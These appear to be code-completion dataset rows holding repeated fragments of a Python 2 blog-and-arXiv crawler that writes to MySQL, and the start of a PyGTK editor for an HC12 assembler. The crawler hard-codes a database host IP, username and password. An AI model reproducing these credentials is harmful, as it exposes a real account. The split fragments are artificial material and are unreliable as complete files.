data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
arxiv_id = arxiv_id[:len(arxiv_id) - 1]
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
|
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main()
| r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest. | identifier_body |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def crawl_medium():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
|
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest.
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main()
| arxiv_id = arxiv_id[:len(arxiv_id) - 1] | conditional_block |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options() | prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def crawl_medium():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
arxiv_id = arxiv_id[:len(arxiv_id) - 1]
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest.
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main() | chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox') | random_line_split |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,widget,data=None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
